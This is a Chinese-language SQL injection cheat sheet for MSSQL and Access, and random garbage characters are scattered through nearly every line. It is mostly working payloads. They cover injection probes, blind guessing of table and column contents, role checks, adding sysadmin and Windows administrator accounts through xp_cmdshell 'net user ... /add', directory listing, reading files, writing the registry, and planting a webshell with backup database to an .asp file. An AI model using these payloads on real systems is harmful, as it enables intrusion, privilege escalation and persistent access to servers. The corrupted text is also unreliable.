1.判断是否有注入;and 1=1 ;and 1=2 !A&>E�eai�
2.初步判断是否是mssql ;and user>0 �noQS bI
@
!6l�}s$1i|
3.注入参数是字符'and [查询条件] and ''=' rtZEK:.�#
j���a�+PVf
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ]r(s�0�2
�aW;D�f�H�
5.判断数据库系统 �L_Lhmtm}m
@�agx��u-Y
;and (select count(*) from sysobjects)>0 mssql y5�`$Aa4~�
9��;�`�E,w
;and (select count(*) from msysobjects)>0 access �(��Kb�_�/
ECr}�7��R%
xp�B*�>�zb
HAd��Dr!/`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �V~"-�\�@�
�I�D�8u&:�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 U\x���$�@J
2�s��u��/I
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 WAD�A�p\&
4)�N��bQ[
9.(1)猜字段的ascii值(access) �{&�0�u:�
�V�l%UT@D|
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (u�-eL#�@
]lZ��g }7h
(2)猜字段的ascii值(mssql) �e�izni��\
e�R�>|1s%^
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �
-�wQ@z6R
nIf~d�s&TT
10.测试权限结构(mssql) A��Nq�3r(
�G�tpBd40"
/�x�w}]Fa5
G:i>MJbxT
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- � �r74'
_y
:�fA|J!^b[
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- /<�T3�^/ '
e^yfoE<��7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- b&2��N�7�%
L^��x�h5{�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ���w,eW?b
J�*;=� f8
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��57[t��UO
xt�1U�g~5�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .n�jk�^,N�
~UQX��t r
;and 1=(select IS_MEMBER('db_owner'));-- L�W!�>_~g-
�%ab�c�-q
i>%��A0.9�
�\"�1�%>O*
11.添加mssql和系统的帐户 @cu#rW�iG
uo-1.[9d�s
;exec master.dbo.sp_addlogin username;-- eNu��]K,rT
;exec master.dbo.sp_password null,username,password;-- @|EWi��f�|
sr-tZ^d5S?
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �jhH&}��d9
) m(!lDz�3
;exec master.dbo.xp_cmdshell 'net user username password g+3_ $qIQ+
UM:]Qba�In
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- t�X~�*.W:�
,C0D|q4/!.
;exec master.dbo.xp_cmdshell 'net user username password /add';-- KtD�
�XB>
9N�eHN@D�)
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;.�Y-e
Q,�
@wcrtf~{)&
u{L�tyDnik
iaH�L&)[YK
12.(1)遍历目录 4)�?s?�+�
Rw�Uo�sh\W
;create table dirs(paths varchar(100), id int) aW�_P��v~
/z`�.-��D(
;insert dirs exec master.dbo.xp_dirtree 'c:\' 9xai�e�R��
R�EWW(.3�o
;and (select top 1 paths from dirs)>0 =d#(�n M*�
[,sm]/�Xlc
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) D-LQQ{!�D5
�a��g6[Nk�
Q$b4\n?44
�$V�,ZH*
g
(2)遍历目录 (/KeGgkhv�
jb�Wg��L�$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- HsK�q/O�yk
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �SA%uGkm:e
TlD�^�EJ�G
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5QP`2��I_n
&[P(}??�Y\
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 jwmPy)X|s\
�[xo-ZDIoG
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 {Kz!)u�aC�
Tly�*i"[&
SvQ�!n4 �$
*�yY�eqm�
13.mssql中的存储过程 �V��I]~uTV
V�-�dy�eb�
xp_regenumvalues 注册表根键, 子键 Y��2[�ik�<
c�!N#nt_<�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 7n]��ukqZ�
Tjic�ltQi4
xp_regread 根键,子键,键值名 X}g"_wN,g>
W:��hTRq��
;exec xp_regread 2`�J#)��f|
(��'Ha$O72
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �[*1:�?mD$
M)3��'\x�:
xp_regwrite 根键,子键, 值名, 值类型, 值 �)v\� A8)[
'�m0_pM1:D
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 NZz^*��Ela
�hWi2�S!*Y
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 m-]F]c=)w<
C�d|��rD�a
xp_regdeletevalue 根键,子键,值名 �80�K"u�[
-��u�faV#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 'L��Y�N��{
<[vsG�Ub�c
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 f`YH�Z��
O
49�=
K]��X
(t��5vBU�j
�|E�&|�6h1
14.mssql的backup创建webshell v%�7Gh�-�P
�ssAGW���P
use model /9�o6R�:�B
�gfiFRwC`v
create table cmd(str image); `jec|i@oO�
u)vS�,dzu
insert into cmd(str) values (''); �^%�O�$7*
<Ok7�-:OxA
backup database model to disk='c:\l.asp'; �wb�� ^>�/
q"Sja!-;|�
]e$�n�;tuW
.E;}.���X
15.mssql内置函数 �Ld
0j!II(
|Xmzq��X%�
;and (select @@version)>0 获得Windows的版本号 -Gj�z+cRns
�qv[w
1;U"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa G��J�:oU�i
[8�>#�b_�>
;and (select user_name())>0 爆当前系统的连接用户 J;yc�A�F�~
r`i.h ^2De
;and (select db_name())>0 得到当前连接的数据库 8X/SNRk6p�
H(kxRPH4@]
=.l>U�w!�
Z/q'^PB
�p
16.简洁的webshell y�ji�>vJHu
?�*6Q�;.f<
use model �ni6zo~+W]
{vk%&{D0)�
create table cmd(str image); N'��0nt]&a
!QC�E�rE;r
insert into cmd(str) values (''); 8�%p+:6kP5
E8�5T�CS�1
backup database model to disk='g:\wwwtest\l.asp';
